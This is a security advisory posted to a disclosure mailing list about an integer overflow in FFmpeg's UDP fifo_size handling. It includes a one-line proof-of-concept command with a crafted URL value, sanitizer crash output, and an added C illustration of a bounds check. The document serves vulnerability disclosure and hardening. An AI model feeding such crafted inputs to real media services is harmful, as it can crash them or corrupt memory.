
Full Disclosure mailing list archives
FFmpeg 7.0+ Integer Overflow in UDP Protocol Handler (fifo_size option)
From: Ron E <ronaldjedgerson () gmail com>
Date: Sun, 7 Sep 2025 02:43:02 -0400
A signed integer overflow exists in FFmpeg's udp.c implementation when parsing the fifo_size option from a user-supplied UDP URL. The overflow occurs in the multiplication used to compute the size of the circular receive buffer. This can result in undefined behavior, allocation failures, or potentially memory corruption depending on compiler optimizations and downstream usage. (FFmpeg 7.0-8.0)

*Impact:*

- Denial of Service (allocation failure, runtime crash).
- Heap buffer overflow if the wrapped value allocates a smaller buffer than required but is later written into with the intended (larger) size.
- Severity depends on compiler behavior and downstream allocations.

*Proof of Concept:*

    ./ffmpeg -i udp://127.0.0.1:1234?fifo_size=2147483647 -f null -

*Output:*

    libavformat/udp.c:760:29: runtime error: signed integer overflow: 2147483647 * 188 cannot be represented in type 'int'
    SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior libavformat/udp.c:760:29
    [in#0 @ 0x512000000040] Error opening input: Cannot allocate memory
    Error opening input file udp://127.0.0.1:1234?fifo_size=2147483647.
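The arithmetic behind the sanitizer line above, as an added illustration that is not code from the report or from FFmpeg: the reported option value multiplied by 188 in int, next to a bounds-checked version that rejects any fifo_size whose product does not fit. The constant name TS_PACKET_SIZE and the query-string parser are assumptions for this example; only the value 188 and the PoC URL come from the report.

```c
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed: the report's sanitizer output shows fifo_size multiplied by 188
   (the MPEG-TS packet size); this constant name is ours, not FFmpeg's. */
#define TS_PACKET_SIZE 188

/* As reported: fifo_size * 188 evaluated in int. Done in unsigned arithmetic
   here so the wrapped result is observable instead of undefined behaviour. */
int wrapped_fifo_bytes(int fifo_size) {
    return (int)((unsigned)fifo_size * (unsigned)TS_PACKET_SIZE);
}

/* Hardened form: returns fifo_size * 188, or -1 when the product cannot be
   represented in int, so a wrapped size never reaches an allocator. */
int checked_fifo_bytes(int fifo_size) {
    if (fifo_size < 0 || fifo_size > INT_MAX / TS_PACKET_SIZE)
        return -1;
    return fifo_size * TS_PACKET_SIZE;
}

/* Extract fifo_size=<n> from a URL or its query string (assumed helper).
   Returns the value (0..INT_MAX), or -1 if absent, malformed or out of range. */
long parse_fifo_size(const char *query) {
    const char *p = strstr(query, "fifo_size=");
    if (!p || (p != query && p[-1] != '&' && p[-1] != '?')) return -1;
    p += strlen("fifo_size=");
    char *end;
    errno = 0;
    long v = strtol(p, &end, 10);
    if (end == p || errno == ERANGE || v < 0 || v > INT_MAX) return -1;
    if (*end != '\0' && *end != '&') return -1;
    return v;
}

int main(void) {
    const char *url = "udp://127.0.0.1:1234?fifo_size=2147483647"; /* PoC URL from the report */
    long fifo = parse_fifo_size(url);
    if (fifo < 0) return 1;
    printf("unchecked: %ld * %d wraps to %d\n", fifo, TS_PACKET_SIZE, wrapped_fifo_bytes((int)fifo));
    int bytes = checked_fifo_bytes((int)fifo);
    if (bytes < 0)
        printf("checked: fifo_size=%ld rejected, product exceeds INT_MAX\n", fifo);
    else
        printf("checked: %d bytes\n", bytes);
    return 0;
}
```

For the PoC value the unchecked product wraps to -188, a byte count no allocator can honour, while the checked version refuses the option before any allocation is attempted.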